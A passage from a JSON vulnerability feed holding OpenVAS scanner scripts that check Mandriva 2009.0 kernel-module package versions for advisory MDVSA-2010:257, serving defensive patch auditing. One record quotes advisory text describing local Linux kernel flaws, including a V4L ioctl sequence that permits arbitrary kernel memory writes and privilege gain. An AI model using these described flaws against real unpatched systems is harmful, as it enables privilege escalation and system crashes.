rpm:\"slmodem-kernel-2.6.27.56-desktop586-1mnb~2.9.11~0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"slmodem-kernel-2.6.27.56-server-1mnb\", rpm:\"slmodem-kernel-2.6.27.56-server-1mnb~2.9.11~0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"slmodem-kernel-desktop586-latest\", rpm:\"slmodem-kernel-desktop586-latest~2.9.11~1.20101216.0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"slmodem-kernel-desktop-latest\", rpm:\"slmodem-kernel-desktop-latest~2.9.11~1.20101216.0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"slmodem-kernel-server-latest\", rpm:\"slmodem-kernel-server-latest~2.9.11~1.20101216.0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"squashfs-lzma-kernel\", rpm:\"squashfs-lzma-kernel~2.6.27.56~desktop~1mnb~3.3~5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"squashfs-lzma-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"squashfs-lzma-kernel-2.6.27.56-desktop586-1mnb~3.3~5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"squashfs-lzma-kernel-2.6.27.56-server-1mnb\", rpm:\"squashfs-lzma-kernel-2.6.27.56-server-1mnb~3.3~5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"squashfs-lzma-kernel-desktop586-latest\", rpm:\"squashfs-lzma-kernel-desktop586-latest~3.3~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"squashfs-lzma-kernel-desktop-latest\", rpm:\"squashfs-lzma-kernel-desktop-latest~3.3~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"squashfs-lzma-kernel-server-latest\", rpm:\"squashfs-lzma-kernel-server-latest~3.3~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tp_smapi-kernel\", rpm:\"tp_smapi-kernel~2.6.27.56~desktop~1mnb~0.37~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tp_smapi-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"tp_smapi-kernel-2.6.27.56-desktop586-1mnb~0.37~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tp_smapi-kernel-2.6.27.56-server-1mnb\", rpm:\"tp_smapi-kernel-2.6.27.56-server-1mnb~0.37~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tp_smapi-kernel-desktop586-latest\", rpm:\"tp_smapi-kernel-desktop586-latest~0.37~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tp_smapi-kernel-desktop-latest\", rpm:\"tp_smapi-kernel-desktop-latest~0.37~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tp_smapi-kernel-server-latest\", 
rpm:\"tp_smapi-kernel-server-latest~0.37~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxadd-kernel\", rpm:\"vboxadd-kernel~2.6.27.56~desktop~1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxadd-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vboxadd-kernel-2.6.27.56-desktop586-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxadd-kernel-2.6.27.56-server-1mnb\", rpm:\"vboxadd-kernel-2.6.27.56-server-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxadd-kernel-desktop586-latest\", rpm:\"vboxadd-kernel-desktop586-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxadd-kernel-desktop-latest\", rpm:\"vboxadd-kernel-desktop-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxadd-kernel-server-latest\", rpm:\"vboxadd-kernel-server-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxvfs-kernel\", rpm:\"vboxvfs-kernel~2.6.27.56~desktop~1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxvfs-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vboxvfs-kernel-2.6.27.56-desktop586-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxvfs-kernel-2.6.27.56-server-1mnb\", rpm:\"vboxvfs-kernel-2.6.27.56-server-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxvfs-kernel-desktop586-latest\", rpm:\"vboxvfs-kernel-desktop586-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"vboxvfs-kernel-desktop-latest\", rpm:\"vboxvfs-kernel-desktop-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vboxvfs-kernel-server-latest\", rpm:\"vboxvfs-kernel-server-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kernel\", rpm:\"vhba-kernel~2.6.27.56~desktop~1mnb~1.0.0~1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vhba-kernel-2.6.27.56-desktop586-1mnb~1.0.0~1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kernel-2.6.27.56-server-1mnb\", rpm:\"vhba-kernel-2.6.27.56-server-1mnb~1.0.0~1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kernel-desktop586-latest\", rpm:\"vhba-kernel-desktop586-latest~1.0.0~1.20101216.1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kernel-desktop-latest\", rpm:\"vhba-kernel-desktop-latest~1.0.0~1.20101216.1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kernel-server-latest\", rpm:\"vhba-kernel-server-latest~1.0.0~1.20101216.1.svn304.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-kernel\", rpm:\"virtualbox-kernel~2.6.27.56~desktop~1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"virtualbox-kernel-2.6.27.56-desktop586-1mnb~2.0.2~2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-kernel-2.6.27.56-server-1mnb\", rpm:\"virtualbox-kernel-2.6.27.56-server-1mnb~2.0.2~2.2mdv2009.0\", 
rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-kernel-desktop586-latest\", rpm:\"virtualbox-kernel-desktop586-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-kernel-desktop-latest\", rpm:\"virtualbox-kernel-desktop-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-kernel-server-latest\", rpm:\"virtualbox-kernel-server-latest~2.0.2~1.20101216.2.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel\", rpm:\"vpnclient-kernel~2.6.27.56~desktop~1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"vpnclient-kernel-2.6.27.56-desktop586-1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel-2.6.27.56-server-1mnb\", rpm:\"vpnclient-kernel-2.6.27.56-server-1mnb~4.8.01.0640~3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel-desktop586-latest\", rpm:\"vpnclient-kernel-desktop586-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel-desktop-latest\", rpm:\"vpnclient-kernel-desktop-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vpnclient-kernel-server-latest\", rpm:\"vpnclient-kernel-server-latest~4.8.01.0640~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia173-kernel\", 
rpm:\"nvidia173-kernel~2.6.27.56~server~1mnb~173.14.12~4mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia173-kernel-server-latest\", rpm:\"nvidia173-kernel-server-latest~173.14.12~1.20101216.4mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:55:28", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2011-01-04T00:00:00", "type": "openvas", "title": "Mandriva Update for kernel MDVSA-2010:257 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2963", "CVE-2010-3850", "CVE-2010-3442", "CVE-2010-3848", "CVE-2010-2240", "CVE-2010-3858", "CVE-2010-3067", "CVE-2010-3849"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:831290", "href": "http://plugins.openvas.org/nasl.php?oid=831290", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for kernel MDVSA-2010:257 (kernel)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability was discovered and corrected in the Linux 2.6 kernel:\n\n The setup_arg_pages function in fs/exec.c in the Linux kernel before\n 2.6.36, when CONFIG_STACK_GROWSDOWN is used, does not properly restrict\n the stack memory consumption of the (1) arguments and (2) environment\n for a 32-bit application on a 64-bit platform, which allows local\n users to cause a denial of service (system crash) via a crafted exec\n system call, a related issue to CVE-2010-2240. (CVE-2010-3858)\n \n drivers/media/video/v4l2-compat-ioctl32.c in the Video4Linux (V4L)\n implementation in the Linux kernel before 2.6.36 on 64-bit platforms\n does not validate the destination of a memory copy operation, which\n allows local users to write to arbitrary kernel memory locations,\n and consequently gain privileges, via a VIDIOCSTUNER ioctl call on a\n /dev/video device, followed by a VIDIOCSMICROCODE ioctl call on this\n device. (CVE-2010-2963)\n \n Integer overflow in the do_io_submit function in fs/aio.c in the\n Linux kernel before 2.6.36-rc4-next-20100915 allows local users to\n cause a denial of service or possibly have unspecified other impact\n via crafted use of the io_submit system call. (CVE-2010-3067)\n \n Multiple integer overflows in the snd_ctl_new function\n in sound/core/control.c in the Linux kernel before\n 2.6.36-rc5-next-20100929 allow local users to cause a denial of\n service (heap memory corruption) or possibly have unspecified\n other impact via a crafted (1) SNDRV_CTL_IOCTL_ELEM_ADD or (2)\n SNDRV_CTL_IOCTL_ELEM_REPLACE ioctl call. 
(CVE-2010-3442)\n \n A kernel stack overflow, a bad pointer dereference and a missing\n permission check were corrected in the econet implementation\n (CVE-2010-3848) (CVE-2010-3849) (CVE-2010-3850).\n \n Additionally, the kernel has been updated to the stable upstream\n version 2.6.27.56.\n \n To update your kernel, please follow the directions located at:\n \n http://www.mandriva.com/en/security/kernelupdate\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"kernel on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-12/msg00018.php\");\n script_id(831290);\n script_version(\"$Revision: 6570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-04 09:11:34 +0100 (Tue, 04 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2010:257\");\n script_cve_id(\"CVE-2010-2240\", \"CVE-2010-3858\", \"CVE-2010-2963\", \"CVE-2010-3067\", \"CVE-2010-3442\", \"CVE-2010-3848\", \"CVE-2010-3849\", \"CVE-2010-3850\");\n script_name(\"Mandriva Update for kernel MDVSA-2010:257 (kernel)\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia96xx-kernel-2.6.27.56-desktop586-1mnb~96.43.07~5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel-2.6.27.56-server-1mnb\", rpm:\"nvidia96xx-kernel-2.6.27.56-server-1mnb~96.43.07~5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel-desktop586-latest\", rpm:\"nvidia96xx-kernel-desktop586-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel-desktop-latest\", rpm:\"nvidia96xx-kernel-desktop-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel-server-latest\", rpm:\"nvidia96xx-kernel-server-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel\", rpm:\"nvidia-current-kernel~2.6.27.56~desktop~1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia-current-kernel-2.6.27.56-desktop586-1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel-2.6.27.56-server\", rpm:\"nvidia-current-kernel-2.6.27.56-server~1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel-desktop586-latest\", rpm:\"nvidia-current-kernel-desktop586-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel-desktop-latest\", rpm:\"nvidia-current-kernel-desktop-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia-current-kernel-server-latest\", rpm:\"nvidia-current-kernel-server-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omfs-kernel\", rpm:\"omfs-kernel~2.6.27.56~desktop~1mnb~0.8.0~1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omfs-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"omfs-kernel-2.6.27.56-desktop586-1mnb~0.8.0~1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omfs-kernel-2.6.27.56-server-1mnb\", rpm:\"omfs-kernel-2.6.27.56-server-1mnb~0.8.0~1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omfs-kernel-desktop586-latest\", rpm:\"omfs-kernel-desktop586-latest~0.8.0~1.20101216.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omfs-kernel-desktop-latest\", rpm:\"omfs-kernel-desktop-latest~0.8.0~1.20101216.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omfs-kernel-server-latest\", rpm:\"omfs-kernel-server-latest~0.8.0~1.20101216.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kernel\", rpm:\"omnibook-kernel~2.6.27.56~desktop~1mnb~20080513~0.274.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"omnibook-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"omnibook-kernel-2.6.27.56-desktop586-1mnb~20080513~0.274.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kernel-2.6.27.56-server-1mnb\", rpm:\"omnibook-kernel-2.6.27.56-server-1mnb~20080513~0.274.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kernel-desktop586-latest-20080513\", rpm:\"omnibook-kernel-desktop586-latest-20080513~1.20101216.0.274.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kernel-desktop-latest-20080513\", rpm:\"omnibook-kernel-desktop-latest-20080513~1.20101216.0.274.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"omnibook-kernel-server-latest-20080513\", rpm:\"omnibook-kernel-server-latest-20080513~1.20101216.0.274.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opencbm-kernel\", rpm:\"opencbm-kernel~2.6.27.56~desktop~1mnb~0.4.2a~1mdv2008.1\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opencbm-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"opencbm-kernel-2.6.27.56-desktop586-1mnb~0.4.2a~1mdv2008.1\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opencbm-kernel-2.6.27.56-server-1mnb\", rpm:\"opencbm-kernel-2.6.27.56-server-1mnb~0.4.2a~1mdv2008.1\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opencbm-kernel-desktop586-latest\", rpm:\"opencbm-kernel-desktop586-latest~0.4.2a~1.20101216.1mdv2008.1\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 
((res = isrpmvuln(pkg:\"opencbm-kernel-desktop-latest\", rpm:\"opencbm-kernel-desktop-latest~0.4.2a~1.20101216.1mdv2008.1\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opencbm-kernel-server-latest\", rpm:\"opencbm-kernel-server-latest~0.4.2a~1.20101216.1mdv2008.1\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ov51x-jpeg-kernel\", rpm:\"ov51x-jpeg-kernel~2.6.27.56~desktop~1mnb~1.5.9~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"ov51x-jpeg-kernel-2.6.27.56-desktop586-1mnb~1.5.9~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-2.6.27.56-server-1mnb\", rpm:\"ov51x-jpeg-kernel-2.6.27.56-server-1mnb~1.5.9~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-desktop586-latest\", rpm:\"ov51x-jpeg-kernel-desktop586-latest~1.5.9~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-desktop-latest\", rpm:\"ov51x-jpeg-kernel-desktop-latest~1.5.9~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-server-latest\", rpm:\"ov51x-jpeg-kernel-server-latest~1.5.9~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qc-usb-kernel\", rpm:\"qc-usb-kernel~2.6.27.56~desktop~1mnb~0.6.6~6mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qc-usb-kernel-2.6.27.56-desktop586-1mnb\", 
rpm:\"qc-usb-kernel-2.6.27.56-desktop586-1mnb~0.6.6~6mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qc-usb-kernel-2.6.27.56-server-1mnb\", rpm:\"qc-usb-kernel-2.6.27.56-server-1mnb~0.6.6~6mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qc-usb-kernel-desktop586-latest\", rpm:\"qc-usb-kernel-desktop586-latest~0.6.6~1.20101216.6mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qc-usb-kernel-desktop-latest\", rpm:\"qc-usb-kernel-desktop-latest~0.6.6~1.20101216.6mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"qc-usb-kernel-server-latest\", rpm:\"qc-usb-kernel-server-latest~0.6.6~1.20101216.6mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2860-kernel\", rpm:\"rt2860-kernel~2.6.27.56~desktop~1mnb~1.7.0.0~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2860-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"rt2860-kernel-2.6.27.56-desktop586-1mnb~1.7.0.0~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2860-kernel-2.6.27.56-server-1mnb\", rpm:\"rt2860-kernel-2.6.27.56-server-1mnb~1.7.0.0~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2860-kernel-desktop586-latest\", rpm:\"rt2860-kernel-desktop586-latest~1.7.0.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rt2860-kernel-desktop-latest\", rpm:\"rt2860-kernel-desktop-latest~1.7.0.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n 
